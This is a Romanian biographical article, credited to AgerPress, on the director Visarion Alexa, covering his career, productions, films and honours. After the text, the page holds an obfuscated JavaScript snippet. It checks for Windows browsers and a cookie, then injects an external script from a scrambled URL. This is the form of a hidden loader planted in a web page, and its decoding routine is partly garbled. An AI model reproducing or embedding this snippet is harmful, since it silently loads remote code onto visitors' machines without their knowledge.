Visarion Alexa

Regizor

Visarion Alexa

Visarion Alexa, regizor şi scenarist de teatru şi film, s-a născut în localitatea Băluşeni, judeţul Botoşani, la 11 septembrie 1947.
A absolvit Institutul de Artă Teatrală şi Cinematografică ''I.L. Caragiale'' din Bucureşti, secţia regie de teatru, în 1971, la clasa lui Radu Penciulescu. Şi-a luat licenţa în 1971 cu piesa ''Năpasta'', de I.L. Caragiale, montată la Teatrul din Piatra Neamţ, iar în 2001 obţine titlul de Doctor în Arte, cu disertaţia ''Spectacolul ascuns - valenţe interpretative şi spectaculare ale teatrului shakespearian''. Profesor universitar la Universitatea Naţională de Artă Teatrală şi Cinematografică ''I.L. Caragiale'' Bucureşti, a fost şi conducător ştiinţific de doctorat la UNATC.
Regizorul Visarion Alexa a desfăşurat o bogată activitate teatrală în ţară şi străinătate, a montat numeroase spectacole în Europa şi America, demonstrând de fiecare dată profesionalism şi talent. A fost prezent ca profesor invitat la universităţi prestigioase din lume, primind, de asemenea, o serie de premii pentru spectacolele de teatru şi filmele sale. Regizor la Teatrul de stat din Arad (1971-1990) şi la Teatrul Odeon (1986-1987), a fost, totodată, director la Teatrul Mic (1992-1993) şi la Teatrul Dramatic din Braşov (2002).
Pe scenele din România şi din străinătate a montat peste 100 de spectacole de teatru. Prima piesă a cărei regie a semnat-o a fost ''Cartofi prăjiţi cu orice'' de A.Wesker, în 1970.
A pus astfel în scenă, conform site-ului yorick.ro (revistă online de teatru), piese de I.L.Caragiale (''Năpasta'' la Teatrul Giuleşti, în 1974, ''O noapte furtunoasă'' tot la Teatrul Giuleşti, în 1979; ''D'ale carnavalului'', în 1984; ''O noapte furtunoasă'' la Teatrul de Artă din Moscova, în 1982; ''D'ale carnavalului'' la Teatrul Lindabauer din Reykjavik, Islanda, 1989), de Anton Pavlovici Cehov (''Trei surori'' la Teatrul Naţional din Timişoara, în 1988; ''Unchiul Vanea'', în 1971; ''Tarara-bumbia'' după A.P.Cehov, la Teatrul Maria Filotti din Brăila, în 1996; ''Pescăruşul'' la Teatrul Naţional din Constanţa, în 1997; semnează regia şi scenariul serialului radiofonic ''Un duel în ziua nunţii'' după A.P. Cehov, la Radio România Cultural, în 2004, cu ocazia ''Anului Cehov''; ''Livada de vişini'', la Teatrul Naţional Craiova, în 2006; ''Unchiul Vanea'' la Actors Theatre of Louisville, SUA, în 1984; ''Un carnaval al dragostei'', după Cehov, la Teatrul Fontanen din Malmö, Suedia, în 1989), de William Shakespeare (''Doi tineri din Verona'', 1970; ''Nopţile regilor'' după W. Shakespeare, la Festivalul Internaţional de Teatru organizat de Academia Experimentală de Teatru din Paris, în 1990; ''Richard al III-lea'', la UWM Training Program, SUA, în 1984; ''Richard II'', la Kentucky Shakespeare Festival, SUA, în 1993; ''Dragoste şi îndrăgostiţi'', scenariu teatral după W. Shakespeare, la Teatrul Fontanen din Malmö, Suedia, în 1994).
Dintre celelalte spectacole montate de regizorul Visarion Alexa amintim: ''Procurorul'' de G. Djagarov (1972), ''Meşterul Manole'' de L.Blaga (1973), ''Puterea şi adevărul'' de Titus Popovici şi ''Pasărea Shakespeare'' de D.R.Popescu (1976), ''O sărbătoare princiară'' de T. Mazilu (1978), ''Goana'' de Paul Ioachim (1979), ''Astă seară se joacă fără piesă'' de Luigi Pirandello (1998) ''Revoluţia Oarbă' de L.M. Arcade (2000) ş.a. A montat, de asemenea spectacolul ''Steaua fără nume'' de M.Sebastian, la Teatrul Naţional I.L.Caragiale din Bucureşti, în 1994, precum şi la Teatrul Naţional Cluj, în 2012. Mai recent, semnează regia spectacolului "Hughie" de Eugene O'Neill, a cărui premieră a avut loc în 2017.
În domeniul cinematografiei semnează regia filmelor ''Înainte de tăcere'' (şi scenarist, 1978; Premiul ACIN, în 1978, pentru cea mai bună interpretare feminină, Valeria Seciu), ''Înghiţitorul de săbii'' (şi scenarist, 1981; Premiul ACIN, în 1982, pentru cea mai bună interpretare masculină, Mircea Albulescu), ''Năpasta'' (şi scenarist,1982; Premiul ACIN, în 1983, pentru originalitatea muzicii, Aurel Stroe), ''Punct şi de la capăt (şi scenarist, în colaborare cu Radu F. Alexandru,1985), ''Vinovatul'' (şi scenarist, în colaborare cu Ion Băieşu, 1991), ''Luna verde'' (şi scenarist, 2010), ''Ana'' (şi scenarist, 2014), potrivit volumului ''1234 cineaşti români'' (Editura Ştiinţifică, Bucureşti, 1996) şi site-ului www.cinemagia.ro.
A fost, de asemenea, preşedinte şi membru în numeroase jurii naţionale de teatru şi film, precum, spre exemplu, juriul pentru Premiile UNITER. În 2009 Visarion Alexa a fost ales membru în Comitetul Director al Uniunii Cineaştilor din România.
Regizorului Visarion Alexa i-au fost decernate numeroase titluri, premii şi distincţii. Amintim, astfel, titlul de Profesor Honoris Causa al Universităţii Babeş-Bolyai Cluj Napoca (2008), Doctor Honoris Causa al Universităţii de Arte din Târgu Mureş (2013), Doctor Honoris Causa al Universităţii de Arte ''George Enescu'' din Iaşi (2013). În 2014 i-a fost decernat titlul de Doctor Honoris Causa al Universităţii Naţionale de Artă Teatrală şi Cinematografică ''I.L.Caragiale''.
În 2005, UNITER l-a răsplătit cu ''Premiul pentru întreaga activitate'', pentru realizările deosebite de-a lungul întregii sale cariere, iar în cadrul unei ceremonii care a avut loc la 19 decembrie 2007 Academia Română i-a acordat premiul ''Aristizza Romanescu'' pentru artele spectacolului, pentru anul 2005, pentru întreaga creaţie teatrală şi cinematografică. La 15 august 2015 a primit titlul de Cetăţean de onoare al comunei Băluşeni.
Preşedinţia României i-a acordat, în 2002, Ordinul Naţional ''Serviciul Credincios'' în grad de Cavaler.
În 2012 i-a apărut volumul de eseuri ''Goana pe nisip'' (Editura Bybliotek).
Traseul artistic şi didactic al regizorului de teatru şi film Alexa Visarion este prezentat, prin evocările mai multor generaţii de actori, regizori, critici, teatrologi şi studenţi, în volumul "Alexa Visarion sau destinul vocaţiei", coordonat de Elena Saulea şi lansat în 2016. O altă lucrare consacrată reputatului regizor este "Univers filmic - Alexa Visarion (Jurnal de spectator)" de Vasilica Bălăiţă, publicată la Editura Artes şi lansată tot în 2016. (sursa: AgerPress)

;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f=0;p--){k+=t[p];}return k;}})();